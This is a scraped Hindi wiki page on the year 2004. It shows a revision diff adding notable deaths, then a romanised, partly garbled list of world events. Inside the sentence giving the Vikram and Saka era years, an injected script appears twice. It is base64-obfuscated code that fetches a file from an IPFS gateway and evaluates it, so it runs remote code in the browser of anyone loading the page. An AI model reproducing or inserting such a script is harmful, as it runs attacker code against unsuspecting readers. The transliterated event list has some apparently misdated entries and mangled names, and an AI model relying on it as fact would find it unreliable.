==वर्ष ईसवी सन् 2004 में जन्मे व्यक्ति==
 
==वर्ष ईसवी सन् 2004 में जन्मे व्यक्ति==
 
*
 
*
 +
 
==वर्ष ईसवी सन् 2004 में हुए निधन==
 
==वर्ष ईसवी सन् 2004 में हुए निधन==
*
+
* [[23 फ़रवरी]] - विजय आनन्द
 +
* [[13 मार्च]] - [[विलायत ख़ाँ]] - [[भारत]] के प्रसिद्ध [[सितार वादक]]
 +
* [[20 अप्रैल]] - [[कोमल कोठारी]] - [[राजस्थान]] के ऐसे व्यक्ति, जो राजस्थानी लोक गीतों व कथाओं आदि के संकलन एवं शोध हेतु समर्पित थे।
 +
* [[1 मई]] - [[राम प्रकाश गुप्ता]] -  '[[भारतीय जनता पार्टी]]' के प्रसिद्ध नेता तथा [[उत्तर प्रदेश]] के भूतपूर्व [[मुख्यमंत्री]] तथा [[मध्य प्रदेश]] के [[राज्यपाल]]।
 +
* [[27 सितम्बर]] - [[शोभा गुर्टू]] - प्रसिद्ध भारतीय [[ठुमरी]] गायिका
 +
* [[13 अक्टूबर]] - [[निरुपा रॉय]] - प्रसिद्ध [[हिन्दी]] फ़िल्म अभिनेत्री
 +
* [[31 जनवरी]]- [[सुरैया]] - प्रसिद्ध  [[अभिनेत्री]] और गायिका
 +
* [[25 फ़रवरी]] - [[बी. नागी रेड्डी]], दक्षिण भारतीय सिनेमा के प्रसिद्ध निर्माता-निर्देशक
 +
* [[29 सितम्बर]] - [[नालापत बालमणि अम्मा]] - [[मलयालम भाषा]] की प्रसिद्ध कवियित्री थीं।
 +
* [[23 दिसम्बर]] - [[नरसिंह राव पी. वी.]] - [[भारत]] के पूर्व [[प्रधानमंत्री]]।
 +
* [[14 अक्तूबर]] - [[दत्तोपन्त ठेंगडी]], राष्ट्रवादी ट्रेड यूनियन नेता एवं [[भारतीय मज़दूर संघ]] के संस्थापक
 +
* [[15 जुलाई]] -[[बानो जहाँगीर कोयाजी]] - भारतीय चिकित्सा वैज्ञानिक तथा परिवार नियोजन विशेषज्ञ
 +
* [[17 फ़रवरी]] - [[जोस लोपेज़ पोरेटील्लो]] - मेक्सिको के [[राष्ट्रपति]] थे।
 +
* [[18 दिसम्बर]] - [[विजय हज़ारे]] - [[भारत]] के जानेमाने [[क्रिकेट]] खिलाड़ी थे।
 +
 
 
==वर्ष ईसवी सन् 2004 के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==वर्ष ईसवी सन् 2004 के महत्त्वपूर्ण अवसर एवं उत्सव==
 
*
 
*

Revision as of 12:16, 25 August 2018

yah panna gregori kalaindar ke varsh eesavi sanh 2004 ka hai.

jisaka samakalin varsh (lagabhag) vikrami sanvat ke anusar 2061<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> hai aur rashtriy shake ke anusar 1926<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> hai.

varsh eesavi sanh 2004 mean ghati mahattvapoorn ghatanaean

  • 1 janavari - chek rashtrapati vaklav havel ko gaandhi shaanti puraskar pradan kiye gaye, sark deshoan ne dakshin eshiya ko mukt vyapar kshetr banane vali saphta sandhi aur sark atankavad virodhi sandhi ko manjoori di.
  • 3 janavari - 12vean sark sammelan mean bhag lene pradhanamantri atal bihari vajapeyi islamabad pahuanche.
  • 4 janavari - bharat ke pradhanamantri atal bihari vajapeyi aur pak pradhanamantri jamali ke bich islamabad mean varta ayojit.
  • 18 janavari - bharat ne kriket ki ekadivasiy shriankhala mean astreliya ko 19 ranoan se haraya.
  • 19 janavari - himachal pradesh mean chamba zile ke garaula gaanv mean ek bas ke nadi mean gir jane se 21 log mare ge.
  • 23 janavari - madhyapradesh mean govansh vadh par poornataya pratibandh lagoo.
  • 25 janavari - aantariksh yan aauparchyuniti mangral grah par saphalatapoorvak utara.
  • 26 janavari - briten ki maharani elijabeth ne maikrosaft adhyaksh bil gets ko 'nait' ki upadhi pradan karane ki ghoshana ki.
  • 31 janavari - pakistani paramanu karyakram ke janak daktar abdul kadir khan pradhanamantri ke vishesh salahakar pad se barkhast.
  • 2 faravari - svis tenis pleyar rojar fedarar 237 haphtoan tak lagatar pahali raikiang par rahe. yah ek rikard hai.
  • 5 faravari - pakistan ke rashtrapati paravej musharraf ne paramanu praudyogiki ke galat istemal ke mamale mean paramanu vaijnanik abdul kadir khan ko maphi di.
  • 6 faravari - terahavian lokasabha bhang.
  • 10 faravari - bagadad mean pulis steshan ke bahar hue kar bam visphot mean 45 logoan ki maut ho gee.
  • 13 faravari - bharatiy tim ne kvalalampur mean dasavian eshiyaee nishanebaji chaimpiyanaship mean svarn padak jita.
  • 14 faravari - jarman nideshak ki 'hed an' film ko goldan biyar puraskar mila.
  • 16 faravari - islamabad mean bharat aur pakistan ke adhikariyoan ke bich varta prarambh.
  • 17 faravari - phoolanadevi hatyakaand ka mukhy abhiyukt shamasher sianh rana tiha d jel se pharar.
  • 19 faravari - kitanashakoan aur audyogik rasayanoan par pratibandh lagane vali st aaukahom sandhi ka vishv ke 50 se zyada deshoan dvara anumodan.
  • 21 faravari - l aaun tenis mean saniya mirza dablyoo.ti.e. khitab jitane vali pahali bharatiy mahila khila di bani.
  • 24 faravari - roos ke rashtrapati bladimir putin ne pradhanamantri mikhail kasyanov ko unake pad se hataya.
  • 26 faravari - makaduniya ke rashtrapati beris trej kovaski ki viman durghatana mean mrityu.
  • 29 faravari - aantarrashtriy aantariksh steshan ke yatri mishel foel ka alekzeandar kelari aantariksh mean utare, par aantariksh soot mean kharabi ke karan pun: vapas steshan laut gaye.
  • 1 march - roos ke rashtrapati ne mikhail fraidakov ko pradhanamantri niyukt kiya. haiti ke rashtrapati jyoan bartara esistade desh chho dakar dakshin afrika bhage.
  • 6 march - uttar koriya ka yooreniyam adharit karyakram hone se phir inkar.
  • 9 march - pakistan ne 2000 kimi. ki marak kshamata vale satah tak mar karane vale 'shahin-2' (hatph-6) prakshepastr ka saphal parikshan kiya.
  • 11 march - spen mean tin relave steshanoan par hue bam visphotoan mean 190 mare, 1200 ghayal.
  • 12 march - dakshin koriyaee sansad mean mahabhiyog parit hone ke bad rashtrapati roh moo hun pad se nilambit, lahaur mean dasavaan dakshes lekhak sammelan prarambh.
  • 14 march - chin mean niji sampatti ko qanooni manyata pradan karane ke lie sanvidhan mean sanshodhan.
  • 16 march - roos mean nau manjila imarat mean visphot, 21 mare.
  • 19 march - amerika ne vishv vyapar sangathan mean pahali bar chin par mukadama thoka.
  • 30 march - taivan ke rashtrapati shen shuvi biyan rashtrapati pad ke lie bharat ke sath shaanti prakriya se hatane ki dhamaki di.
  • 1 aprail - multan mean bharat ne pak dharati par pahali jit darj karate hue pakistan ko ek pari aur 52 ranoan se haraya.
  • 4 aprail - bharat-nepal ki aantarrashtriy sima par maovadiyoan ne 18 bharatiy tel taiankaroan mean ag lagaee.
  • 7 aprail - emanesti iantaraneshanal dvara jari riport mean maut ki saza dene mean chin, eeran v amerika ko sabase age bataya gaya hai. kvalalanmapur mean myaanmar dootavas ke sharanarthiyoan ko ag ke havale kiya.
  • 9 aprail - eerak mean sangharsh tez par ameriki kafile par hamale mean 9 logoan ki mrityu. purtagal ke sarvochch nyayalay ne bharat ke kee aparadhik mamaloan mean vaanchhit maphiya saragana aboo salem ke bharat pratyarpan sambandhi adesh ki pun: samiksha karane ko kaha.
  • 11 aprail - islamabad mean bharat ke prakhyat gayak kalakar sonoo nigam ke karyakram sthal ke pas ek kar mean bam visphot.
  • 13 aprail - entigua mean brayan lara ne ianglaiand ke viruddh khelate hue 400 ranoan ki aitihasik pari kheli.
  • 14 aprail - ameriki rashtrapati jarj bush ne eerak ko doosara viyatanam n banane dene ki ghoshana ki.
  • 15 aprail - rajiv gaandhi hatyakaand se ju de litte ugravadi vi. muralidharan ki kolambo mean hatya ki gayi.
  • 16 aprail - bharat mean ravalapiandi mean tisare test maich mean pakistan ko harakar donoan deshoan ke bich ayojit shriankhala 2-1 se jiti.
  • 21 aprail - basara mean misail hamale mean 68 logoan ki mrityu.
  • 22 aprail - uttar koriya mean trenoan ki bhishan takkar, 3000 hatahat.
  • 25 aprail - jimbavve mean shrilanka ke khilaf ek divasiy maichoan mean nyoonatam 35 ranoan ka rikard banaya. yoonani saipras ne ekikaran yojana thukaraee. chin mean sars ki bimari ek bar phir se phailane ki pushti huee.
  • 26 aprail - eerak ke naye jhande ko manyata mili.
  • 28 aprail - thabombeki ne dakshin afrika ke rashtrapati pad ki shapath li. thailaiand mean pulis chauki par hamale mean 122 logoan ki mrityu.
  • 30 aprail - phajula (eerak) mean hiansa mean 10 ameriki sainik mare gaye.
  • 1 mee - yooropiy sangh mean 10 naye rashtr shamil.
  • 2 mee - marek belka polaiand ke naye pradhanamantri bane.
  • 3 mee - vestiandij ne chhathe ek divasiy maich mean ianglaiand ko char viket se parast kiya.
  • 6 mee - chin ne sikkim ko bharat ka aang mana.
  • 7 mee - nepal ke pradhanamantri soory bahadur thapa ne istifa diya.
  • 8 mee - shrilanka ke muralidharan ne 521 viket lekar sarvadhik test viket lene ka rikard banaya.
  • 9 mee - chechenya mean ek visphot mean vahaan ke rashtrapati akhamad kadarov ka nidhan.
  • 14 mee - deli mirar namak patrika ne eerak mean yuddhabandiyoan par kathit atyachar ko darshane vali jhoothi tasviroan ke prakashan ke lie briten se maphi maangi.
  • 16 mee - rojar federar ne hembarg mastars khitab jita.
  • 18 mee - israyal ke rapha visthapit kaimp mean israyali sainikoan ne 19 filistiniyoan ko maut ke ghat utara.
  • 20 mee - taivan mean navagathit sarakar ne shapath grahan ki. yooropiy sangh ke bad amerika ne bhi krishi niryat sabsidi kam karane ki ghoshana ki.
  • 23 mee - baangladesh mean toofan ke karan meghana nadi mean nav doobane se 250 doobe. siangapur mean jahaz ke taiankar se takarane ke karan 4000 karean doobi.
  • 29 mee - myaanmar mean chakravati toofan ne 140 logoan ki jan li. pakistan ne paramanu vaijnanik abdul kadir khan par lagaye gaye pratibandhoan mean dhil di.
  • 30 mee - soodi arab mean bandhak sankat samapt, parantu do bharatiyoan sahit 22 ki hatya.
  • 1 joon - iraki prashasakiy parishad ke pramukh sunni neta gaji mashal ajij al yavar eerak ke naye rashtrapati bane.
  • 2 joon - astreliyaee m aaudal jenifar h aaukins mis yoonivars banian.
  • 3 joon - ken ford nasa ke aantariksh khoj painal ke netritvakarta bane.
  • 6 joon - bhootapoorv ameriki rashtrapati ronald rigan ka nidhan.
  • 7 joon - israyali mantrimandal ne gaja kshetr se bastiyaan hatane sambandhi prastav ko manjoori di.